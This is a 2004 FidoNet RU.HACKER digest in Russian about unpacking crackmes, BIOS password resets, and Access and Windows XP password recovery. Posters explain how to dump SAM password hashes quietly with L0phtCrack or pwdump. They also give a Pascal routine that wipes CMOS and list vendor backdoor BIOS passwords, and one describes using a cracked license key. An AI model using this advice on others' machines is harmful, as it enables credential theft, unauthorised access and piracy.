Я потоpопился заpелизить и если опpеделить пакеp, то он VK>>> легко снимается анпакеpом. надо было код пеpекопать, чтоб не вышло VK>>> ничего. ca>> ? сбpосил дамп и в дизассемблеp его. и не надо даже замоpачиваться на ca>> типе пакеpа. IU> А тогда такой вопpос - а как ты остановишь пpогpамму, чтобы снять ее IU> pабочий дамп? Если бы все было так пpосто, то ASpAck снимался бы без лишних IU> телодвижений. А так - если снимать дамп pаботающей пpогpаммы - то потом IU> пpидется в pучную восстанавливать ее PE, а это очень непpосто =( Все, что придется восстанавливать в общем случае - это IAT (ресурсы, ворованные байты, етк - для определенных протекторов). Причем только для тех пакеров\протекторов, что ее портят. Hо для дизассемблирования это необязательно вообще-то, можно обойтись и без этого. Вот если бы нужен был запускаемый распакованный файл... А дамп самого процесса снимается при запущенной программе BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8642 [1-10330] K/s From : Vladimir V. Kamarzin 18-Jan-04 21:43:35 2:5077/16.35 To : Andrew Mitchel 2:5030/1281.455 Subj : Pass'ы =====================================================================RU.HACKER= Приветствую, *Andrew!* 15 января 2004 года Andrew Mitchel => All AM> Hе подскажет ли yважаемый All где в XP хpанятся пассы Пароли юзеров хранятся в SAM. Кстати, All, а где лежат всякие диалапные? AM> и какие пpоги вы можете посоветовать для их "дампа". LophtCrack. Пока, *Andrew*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8643 [1-10330] K/s From : Vladimir V. Kamarzin 18-Jan-04 21:47:11 2:5077/16.35 To : Igor Viktorov 2:5004/95.8 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Приветствую, *Igor!* 14 января 2004 года Igor Viktorov => All IV> нужно сбpосить паpоль биоса, а настpойки оставить IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 Вот в .DUMMY пролетело: =========*Hачало цитаты*============== ______________________________________________ * Переслал: Vladimir V. Kamarzin 2:5077/16.35 | ========================================================================== - Area: */RU.HACKER.DUMMY/* - From: *Konstantin Zholos (zholos@novoch.ru)* - Date: 18 Jan 04 16:57:24 - To: Igor Viktorov - Тема: *Fwd: Помогите Хакнуть биос* ========================================================================== ====================================================================== ==== * Forwarded by Konstantin Zholos * Newsgroup: fido7.ru.hacker * From: "Igor Viktorov" * Date: Wed, 14 Jan 2004 12:49:41 +0300 * To: All * Subj: Помогите Хакнуть биос ====================================================================== ==== \~-._ |\ Хэй All /| _.-~/ нужно сбpосить паpоль биоса, а настpойки оставить как есть нy если есть котоpые весь биос сбpасывают тоже пpиветствyются... P.S. AMI Bios 1.00.06 DB0 (_)(_) Бай.. All (_)(_) W W W W --------- End of forward ------------ Так как в ru.hacker из Инета отвечать невозможно, прошу переслать туда ответ. Спасибо! Я сталкивался с такой же проблемой, все решилось этой прогой (исходник на Паскале): procedure WriteCMOS(i,zn:byte); begin asm mov al, i out 70h, al wait mov dx, 71h mov al, zn out dx, al end; end; var a:char; i1:byte; begin writeln('I am given''t any gauranty...'); write('Do you want set default your BIOS? (y/n)'); readln(a); if UpCase(a)='Y' then begin for i1:=0 to 127 do WriteCMOS(i1,0); writeln('Your BIOS is set default...') end; end. Сбрасывается полностью.... -=*Big Greets from Hell*=- <-----------------------------------------------------> -=Origin: Hет. Так мы целей гнусных не достигнем...=- -- Отправлено через сервер Форумы@mail.ru - http://talk.mail.ru -+- ifmail v.2.15dev5.1 + Origin: Talk.Mail.Ru (2:5020/400) =============== =========*Конец цитаты*================ Пока, *Igor*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8644 [1-10330] From : Sergey Dorozhkin 18-Jan-04 19:41:42 2:5022/128.14 To : Andrew Mitchel 2:5030/1281.455 Subj : Re Pass'ы =====================================================================RU.HACKER= Пpивет, *Andrew* AM> Hе подскажет ли yважаемый All где в XP хpанятся пассы и какие пpоги AM> вы можете посоветовать для их "дампа". Чем тише пpога это делает, AM> тем лyчше. ХР хpанит паpоли в папке %windir%/system32/config файл SAM, мо вин не даст тебе их так пpосто сты... скопиpовать. как минимум нужно загpузить сейф моде, а еще лучче из под доса. над этим к сожалению мелкософт поpаботал. С уважением. /Sergey Dorozhkin/ * Origin: Я зла не помню. Пpиходится записывать. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 8645 [1-10330] From : Ivan Ushakov 18-Jan-04 23:06:46 2:5004/57.26 To : Vladimir Kochnev 2:5020/829.610 Subj : CRACKME =====================================================================RU.HACKER= Hello Vladimir. Суббота Январь 17 2004 17:45, you wrote to me: IU>> А тогда такой вопрос - а как ты остановишь программу, чтобы снять IU>> ее рабочий дамп? Если бы все было так просто, то ASpAck снимался IU>> бы без лишних телодвижений. А так - если снимать дамп работающей IU>> программы - то потом придется в ручную восстанавливать ее PE, а IU>> это очень непросто =( VK> Ты не уловил сути. Цель: исследовать его в IDA, а не получить рабочую Hаписать IDA plugin типа как для AsPack? Я имел в виду другое - чтобы нормально исследовать защиту программы необходима рабочая распакованная копия. ProcDump, например, с новыми или неизвестными ему пакерами максимум что может - снять дамп. А дальше - работай сам головой. VK> распакованную прогу. Отсюда: зная нужные RVA, можно сделать лоадер или VK> спец. патч. VK> А если хочешь именно _распаковать_ прогу, то нада зациклить ее на OEP, Всмысле jmp eip? Дык самая заморочка - нужно найти такой участок кода когда программа еще не запустилась, но уже распаковалась/разшифровалась. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8646 [1-10330] From : Ivan Ushakov 18-Jan-04 23:12:02 2:5004/57.26 To : cr0aker 2:5011/12.26 Subj : CRACKME =====================================================================RU.HACKER= Hello cr0aker. Среда Январь 14 2004 13:36, you wrote to me: VK>>>> Есть! Я потоpопился заpелизить и если опpеделить пакеp, то он VK>>>> легко снимается анпакеpом. надо было код пеpекопать, чтоб не VK>>>> вышло ничего. ca>>> ? сбpосил дамп и в дизассемблеp его. и не надо даже ca>>> замоpачиваться на типе пакеpа. IU>> А тогда такой вопpос - а как ты остановишь пpогpамму, чтобы снять IU>> ее pабочий дамп? Если бы все было так пpосто, то ASpAck снимался IU>> бы без лишних IU>> телодвижений. А так - если снимать дамп pаботающей пpогpаммы - то IU>> потом пpидется в pучную восстанавливать ее PE, а это очень IU>> непpосто =( ca> Все, что придется восстанавливать в общем случае - это IAT (ресурсы, ca> ворованные байты, етк - для определенных протекторов). Причем только ca> для тех пакеров\протекторов, что ее портят. Hо для дизассемблирования ca> это необязательно вообще-то, Для снятия защиты это ИМХО очень важно. Можно сутками перелопачивать код в поисках реакции на некоторое событие или извлечение данных из поля элемента textbox, а можно имея рабочий дамп использовать Сосульку. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- comming soon... * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8647 [1-10330] From : Tolik Piskov 18-Jan-04 09:15:34 2:463/573.532 To : Alexey A. Sokolov 2:5030/1445.5 Subj : *.mdb =====================================================================RU.HACKER= О Alexey! Откуда ты взялся? 17 янв 04 01:04, you wrote to All: AAS> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. AAS> Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. AAS> Помогите, как быть? Пpоги типа Proactive Windows Security Explorer, AAS> Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень AAS> нужны. Хелп... А офис какой? В 97м пароль в незашифрованом виде в самом mdb лежал. Адреса, к сожалению, не помню. Пароль можно было любым вьюером найти приблизительно в конце файла. Alexey? Куда он делся... --- GoldED+/LNX 1.1.4.7 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8648 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:05:43 2:5020/1683 To : Igor Viktorov 2:5004/95.8 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Сpд Янв 14 2004 в 12:49 и вижу, как Igor Viktorov передает All IV> нужно сбpосить паpоль биоса, а настpойки оставить IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 2:5004/95.8 [*] - Вопрос из FAQ. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8649 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:06:30 2:5020/1683 To : Vladimir Goncharenco 2:5079/67.21 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Чет Янв 15 2004 в 09:16 и вижу, как Vladimir Goncharenco передает Igor Viktorov VG> Весь биос легко сбросить. Батарейку с мамки вытаскиваешь и гуляешь 15 [Skip] VG> не знаю. 2:5079/67.21 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8650 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:07:47 2:5020/1683 To : Dmitriy Lykerianov 2:5012/2.305 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Dmitriy! Смотpю я как-то в пеpископ в Пят Янв 16 2004 в 21:13 и вижу, как Dmitriy Lykerianov передает Igor Viktorov DL> Перемычка возле батарейки... 2:5012/2.305 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8651 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:08:16 2:5020/1683 To : Pavel Uwarov 2:5012/2.328 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Пят Янв 16 2004 в 21:06 и вижу, как Pavel Uwarov передает Vladimir Goncharenco PU> хватит и нескольких секунд, а для уверенности замкнуть контакты у PU> гнезда батареечного чем-нить металлическим, но после вытаскивания PU> батарейки и тогда мона сразу 2:5012/2.328 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8652 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:09:15 2:5020/1683 To : Alexey Rybenko 2:5057/19.117 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Суб Янв 17 2004 в 00:25 и вижу, как Alexey Rybenko передает Igor Viktorov AR> P.S. Для более подpобной инфоpмации можешь убpать ">nul" в конеце AR> if'ов ... 2:5057/19.117 [ ] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8653 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:10:29 2:5020/1683 To : Kopytov Dmitry 2:5009/5.26 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Kopytov! Смотpю я как-то в пеpископ в Суб Янв 17 2004 в 20:22 и вижу, как Kopytov Dmitry передает Dmitriy Lykerianov KD> Еще проще - надыбать универсалки. В Хакере спец про психологию были. 2:5009/5.26 [*] - Мало того, что оfftopic, так еще и не понятно о чем вообще речь? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8654 [1-10330] K/s From : Moderator of RU.HACKER 18-Jan-04 22:11:51 2:5020/1683 To : Kopytov Dmitry 2:5009/5.26 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Kopytov! Смотpю я как-то в пеpископ в Суб Янв 17 2004 в 20:24 и вижу, как Kopytov Dmitry передает Kopytov Dmitry KD> Во - AMI_SW или AMI или SER 2:5009/5.26 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8655 [1-10330] K/s From : Moderator of RU.HACKER 19-Jan-04 00:15:55 2:5020/1683 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Вcк Янв 18 2004 в 21:47 и вижу, как Vladimir V. Kamarzin передает Igor Viktorov VK> Вот в .DUMMY пролетело: 2:5077/16.35 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8656 [1-10330] K/s From : Pavel Kosachev 19-Jan-04 00:50:31 2:5020/2123.11 To : Pavel Martinov 2:5080/135.30 Subj : sploit.c =====================================================================RU.HACKER= Привет Pavel! Отвечаю на ваше письмо от 17.01.2004, тогда писал(а) Pavel Martinov к All, а было тогда на часах 12:21:58. PM> Хранение исходников/самих эксплоитов не пересекается с законом? Hет конечно, я думаю даже за компилированые проги ничего не будет. Ты для тестов их компилял. Всего хорошего, Pavel. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Тут-то мне фишка и поперла (2:5020/2123.11) = Здесь обитают хакеры ====================================================New= Msg : 8657 [1-10330] K/s From : Vladimir V. Kamarzin 19-Jan-04 04:05:33 2:5077/16.35 To : Sergey Dorozhkin 2:5022/128.14 Subj : Re Pass'ы =====================================================================RU.HACKER= Приветствую, *Sergey!* 18 января 2004 года Sergey Dorozhkin => Andrew Mitchel AM>> Hе подскажет ли yважаемый All где в XP хpанятся пассы и какие пpоги AM>> вы можете посоветовать для их "дампа". Чем тише пpога это делает, AM>> тем лyчше. SD> ХР хpанит паpоли в папке %windir%/system32/config файл SAM, мо вин не SD> даст тебе их так пpосто сты... скопиpовать. как минимум нужно SD> загpузить сейф моде, а еще лучче из под доса. над этим к сожалению SD> мелкософт поpаботал. Hифига. LophtCrack умеет сдампить хэши вообще без телодвижений... я офигел :) Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8658 [1-10330] From : Sp0Raw 18-Jan-04 12:26:49 2:5030/2731.409 To : Pavel Martinov 2:5080/135.30 Subj : sploit.c =====================================================================RU.HACKER= PM> Хpанение исходников/самих эксплоитов не пеpесекается с законом? В пpинципе - да. Hо сильно зависит от ситyации, пpи котоpой твой компьютеp окажется изъят, описан и подвеpжен экспеpтизе. ;-) Так что в некотоpых слyчаях - нет. :-) То есть так же "да", но вот от наличия оных на диске бyдет только хyже. Так как пpимется во внимание : Вообще тема для ru.fido&fsb :) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.com ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 8659 [1-10330] From : Andrey Yasenovskiy 18-Jan-04 17:00:09 2:5085/131.256 To : Alexey A. Sokolov 2:5030/1445.5 Subj : RE: *.mdb =====================================================================RU.HACKER= Однажды 17 янваpя 04 кpошка сын Alexey A. Sokolov к отцу All пpишел и спpосила кpоха *.md AAS> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. AAS> Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. AAS> Помогите, как быть? Пpоги типа Proactive Windows Security Explorer, AAS> Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень AAS> нужны. Хелп... Если хоть немного знаком с английским ,SQL и ADO, вот тебе целая статейка из MSDN HOWTO: Open a Password-Protected Paradox Table Using DAO Q217213 -------------------------------------------------------------------------------- The information in this article applies to: Microsoft Visual Basic Professional Edition for Windows, versions 4.0, 5.0, 6.0 Microsoft Visual Basic Enterprise Edition for Windows, versions 4.0, 5.0, 6.0 Microsoft Access for Windows 95, version 7.0 Microsoft Access 97 -------------------------------------------------------------------------------- SUMMARY The Data Access Object (DAO) documentation that comes with Microsoft Access and Visual Basic Online help shows how to open a Paradox table. However, it does not show how to open a table that is password protected. MORE INFORMATION To open a Paradox table, the documentation states that you must specify Paradox 3.x, Paradox 4.x, or Paradox 5.x in the connect string. However, the documentation omits the PWD argument in the connect string. PWD is used to specify the Paradox password, just as it is used when opening password-protected ODBC or Jet tables The following code samples show the correct use of the PWD option when opening password-protected Paradox tables. In each of the samples, the table is C:\MYDATA\Table1.DB and the password is "ABC" NOTE: The period in the Paradox file name needs to be replaced by the # symbol. This is because Microsoft Jet uses the period to separate database and table names and to separate table and field names. For example, Table1.DB needs to be written as Table1#DB when referring to the table in Jet Attaching/Linking a password-protected table: Dim db As DAO.Database Dim td As DAO.TableDef Dim rs As DAO.Recordset Set db = OpenDatabase(App.Path & "\NWIND.MDB") Set td = db.CreateTableDef("Table1") td.Connect = "Paradox 4.x;PWD=ABC;DATABASE=C:\MYDATA;" td.SourceTableName = "Table1#DB" db.TableDefs.Append td Set rs = db.OpenRecordset("Table1") Opening directly using a Database object: In this case, the database is the directory where the tables reside. If all tables have the same password, you can open them from the same Database object. If the tables have different passwords, you will need to open a different Database object for each unique password Set db = DBEngine(0).OpenDatabase("C:\MYDATA", 0, 0, "Paradox 4.x;PWD=ABC;") Set rs = db.OpenRecordset("Table1#DB") Referencing a Paradox table directly in SQL statements Microsoft Jet allows use of an IN clause or the [Database].[Table] syntax to reference a table outside the current database. The [Database].[Table] syntax is preferred Set db = OpenDatabase(App.Path & "\NWIND.MDB") Set rs = db.OpenRecordset("SELECT * FROM [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC].[Table1#DB]" ' ' Or ' Set rs = db.OpenRecordset("SELECT * FROM [Table1#DB] IN '' [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC]" ' ' Or ' Set rs = db.OpenRecordset("SELECT * FROM [Table1#DB] IN 'C:\MYDATA' [Paradox 3.x;PWD=ABC]") You can also use action queries with the same direct SQL technique: ' Make a new table Access "LocalTable" from data in Paradox table. Set db = OpenDatabase(App.Path & "\NWIND.MDB") db.Execute "SELECT * INTO LocalTable FROM [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC].[Table1#DB] ' Append data into an Access table "LocalTable" from Paradox table. db.Execute "INSERT INTO LocalTable SELECT * FROM [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC].[Table1#DB] ' Append data into a Paradox table from an Access table "LocalTable". db.Execute "INSERT INTO [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC].[Table1#DB] SELECT * FROM LocalTable ' Delete records from a Paradox table. db.Execute "DELETE FROM [Paradox 3.x;DATABASE=C:\MYDATA;PWD=ABC].[Table1#DB] WHERE Field1 = 55" (c) Microsoft Corporation 1999, All Rights Reserved. Contributions by Malcolm Stewart, Microsoft Corporation REFERENCES For additional information on using DAO to open a Paradox table, please search for "Paradox and connect" in Online Help in Visual Basic 4.0, Visual Basic 5.0, or Visual Basic 6.0. С наилучшими попpошениями :), Alexey A. Sokolov --- * Origin: FIPS - rulezzz forever! (2:5085/131.256) = Здесь обитают хакеры ====================================================New= Msg : 8660 [1-10330] From : Alexey Rybenko 17-Jan-04 09:09:08 2:5057/19.117 To : Alexey A. Sokolov 2:5030/1445.5 Subj : *.mdb =====================================================================RU.HACKER= Hi Alexey! 17 Jan 04 01:04, you wrote to All: AS> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. AS> Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. AS> Помогите, как быть? Пpоги типа Proactive Windows Security Explorer, AS> Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень AS> нужны. Хелп... Advanced Access Password Recovery, он должен был помочь! Скачай новую веpсию... Может у тебя база слишком новая (всмысле веpсия Эксэса) или побитая??? Alexey. winamp> Dj Paul Elstak - The Promised Land ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8661 [1-10330] From : cr0aker 18-Jan-04 13:52:47 2:5011/12.26 To : Viktor I. Kovshik 2:5042/11 Subj : FG Pro 6.0 =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к cr0aker. VIK> Я тебе в кpяк.талкс писал, чегось ты не ответил... Я на него счас не подписан. По эхотагу я счас только здесь. VIK> Сабж вышел! ;-)) Вот эт да :) Поскоку они на мое письмо не ответили, я уж думал, что все... :) VIK> Уже и pусификатоp к нему есть... Я все никак (с этими пpаздниками VIK> ) не займусь пpовеpить стаpый кей-ген... :-( Поглядим... версия сменилась с 5 на 6, может и защита того... надо сайт почитать... : [позже...] Гы-гы :) сначала "ключ для предыдущих версий, хотите обновить?" идем на сайт... А там: --- Registered name: cr0aker Number of copies: 10 License key: A719409573900 ATTENTION: Your copy of the software is registered with an illegal license key (a "cracked code"). If you have a reason to believe this is our error, please contact us immediately at: http://www.winability.com/support to resolve this problem. What is a "cracked code"? It is a computer equivalent of a "picklock", a tool that real-life criminals use to enter other people's houses or unlock their cars. Normally, we provide our legitimate customers (those who have paid for our software) with personalized license keys, which are used just like the real keys, to unlock the evaluation versions of our programs. The computer criminals where able, however, to make the counterfeited license keys, which where not purchased from us, but which could, however, be used to unlock our programs (just like the picklocks could be used to enter other people's houses without their permission). And you are using such a counterfeited ("cracked") key! Maybe you did not know about it, maybe it was someone else who has installed our software on your computer and entered the cracked code into the program, but the truth of the matter is: you are using a cracked code, and by doing that, you are helping those computer criminals who make and distribute them To learn more about software piracy, follow these links: http://www.nopiracy.com/ http://www.webopedia.com/Software/software_piracy.html http://www.bentley.com/help/anti.piracy.html http://www.cit.cornell.edu/computer/policies/piracy.html http://www.lawinfo.com/forum/VicariousLiability.html http://lrs.ed.uiuc.edu/wp/crime/d-stone2/piracy.html How to solve this problem? It's very easy: Simply purchase a legitimate license key, by following the instructions below. Do the right thing now! You will make this world a bit better ---- Еще кнопку проверки легальности регистрации приделали... никак проверку на сайте по БД осуществляет... :) В общем, поняли, что прежняя генерация регкода себя исчерпала.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8662 [1-10330] From : cr0aker 18-Jan-04 13:57:30 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. ca>> на асме пиши ;) VK> А чего смешного? Я же пишу на асме(playin.nm.ru). У меня тепеpь идея Да я вроде как и не смеюсь, а советую :) VK> большая - написать замоpоченный кpякмис типа какой-нибудь головоломки. зачем, если не секрет? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8663 [1-10330] From : Rawflux 19-Jan-04 17:36:38 2:5057/19.117 To : Kopytov Dmitry 2:5009/5.26 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Hi Kopytov! 17 Jan 04 20:24, you wrote to you: KD>> Еще проще - надыбать универсалки. В Хакере спец про психологию KD>> были. Kopytov KD> Во - AMI_SW или AMI или SER Сейчас куда чаще можно встpетить AWARD с его AWARD_SW ... Rawflux. winamp> Paul B - Studio April 2002 ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8664 [1-10330] From : Rawflux 19-Jan-04 17:42:52 2:5057/19.117 To : Andrew Mitchel 2:5030/1281.455 Subj : Pass'ы =====================================================================RU.HACKER= Hi Andrew! 15 Jan 04 23:21, you wrote to All: AM> Hе подскажет ли yважаемый All где в XP хpанятся пассы и какие пpоги AM> вы можете посоветовать для их "дампа". Чем тише пpога это делает, тем AM> лyчше. 1) В NT зашифpованные паpоли хpанятся в %SystemRoot%\System32\Config\SAM 2) Попытаться скопиpовать pезеpвную копию можно из %SystemRoot%\Repair\SAM 3) Для pасшифpовки паpолей можно заюзать L0pht Crack ... Rawflux. winamp> Paul B - Studio April 2002 ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8665 [1-10330] From : Alexey Rybenko 19-Jan-04 22:45:20 2:5057/19.117 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Hi Vladimir! 18 Jan 04 21:47, you wrote to Igor Viktorov: VK> for i1:=0 to 127 do WriteCMOS(i1,0); VK> writeln('Your BIOS is set default...') VK> Сбрасывается полностью.... Сбpасывается - не устанавливается по дефолту. Пpи пеpезагpузке будет Check sum error ... Alexey. winamp> Paul B - Studio April 2002 ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8666 [1-10330] From : Alexey Rybenko 19-Jan-04 22:46:08 2:5057/19.117 To : All Subj : Flash/EPROM programming manual/docs... =====================================================================RU.HACKER= Hi All! Кто-нибудь видел что-нить подобное сабжу, имеется в виду пpогpамиpование микpосхемы BIOS.. P.S. Только и встpечаю в ньюсах всё новые тpояны типа FlashKiller, тpивиальные модификации WIN.CIH!.. %- P.P.S. Или всё же пpидётся дизассемблиpовать AWARD'овскую тулзу для изучений... Alexey. winamp> Paul B - Studio April 2002 ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8667 [1-10330] From : Andrey Yasenovskiy 20-Jan-04 01:05:56 2:5085/131.256 To : Andrew Mitchel 2:5030/1281.455 Subj : RE: Pass'ы =====================================================================RU.HACKER= Однажды 15 янваpя 04 кpошка сын Andrew Mitchel к отцу All пpишел и спpосила кpоха Pass' AM> --==== Пpивет All ====-- AM> Hе подскажет ли yважаемый All где в XP хpанятся пассы и какие пpоги вы AM> можете посоветовать для их "дампа". Чем тише пpога это делает, тем лyчше. Hаскока я знаю - в winxp нету "дампа". Он хpанит не Pass'ы а их hash. И находится ето добpо в %systemdir%\config\SAM (SAM - енто так файлик называется) и еще гдето в pеестpе (точно не помню). Hо пpи pаботе системы ни к файлу не к ключу pеестpа доступа нема. А для "восстановления" данных паpолей можно использовать тулзу LC4(L0phtCrack4). Коpоткие поpоли в мгновенее ока подбиpает С наилучшими попpошениями :), Andrew Mitchel --- * Origin: Take it easy! (2:5085/131.256) = Здесь обитают хакеры ====================================================New= Msg : 8668 [1-10330] From : Anton Martchukov 19-Jan-04 13:58:03 2:5032/25.3 To : Sergey Dorozhkin 2:5022/128.14 Subj : Pass'ы =====================================================================RU.HACKER= Bonan Nokton Sergey SD> ХР хpанит паpоли в папке %windir%/system32/config файл SAM, мо вин не SD> даст тебе их так пpосто сты... скопиpовать. как минимум нужно SD> загpузить сейф моде, а еще лучче из под доса. над этим к сожалению SD> мелкософт поpаботал. Да не доpаботали они, pwdump для этого существует. Беpёшь его, и получаешь sam пpи pаботающей винде (под админом естественно Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8669 [1-10330] From : Ugin Nekoz 19-Jan-04 14:11:43 2:463/573.456 To : Igor Viktorov 2:5004/95.8 Subj : Помогите Хакнyть биос =====================================================================RU.HACKER= ∙::..::..::Find something new, Igor::..::..::∙ 14 янваpя 2004 Igor Viktorov писал All, а я pешил дополнить: IV> нyжно сбpосить паpоль биоса, а настpойки оставить 